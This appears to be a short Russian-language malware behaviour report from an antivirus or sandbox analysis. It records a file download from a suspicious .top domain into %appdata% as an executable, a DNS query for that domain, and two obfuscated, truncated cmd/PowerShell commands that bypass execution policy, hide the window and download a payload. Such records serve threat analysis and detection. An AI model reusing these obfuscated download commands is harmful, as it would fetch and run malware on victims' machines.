Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^W^erSHELL.eXE ^-^E^xE^Cu^tiOnp^o^lIcy^ b^YPaSs ^-nop^ro^FI^lE^ ^-^W^INd^owS^TYl^e hID^d^En ^(NE^w-^O^BJ^eCT sY^StEm.^n^eT^.w^Ebc^LiENT^).D^oW^NL^oADFile(^'http://hometowergo...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "P^o^W^erSHELL.eXE ^-^E^xE^Cu^tiOnp^o^lIcy^ b^YPaSs ^-nop^ro^FI^lE^ ^-^W^INd^owS^TYl^e hID^d^En ^(NE^w-^O^BJ^eCT sY^StEm.^n^eT^.w^Ebc^LiENT^).D^oW^NL^oADFile(^'http://hometowergo...' (со скрытым окном)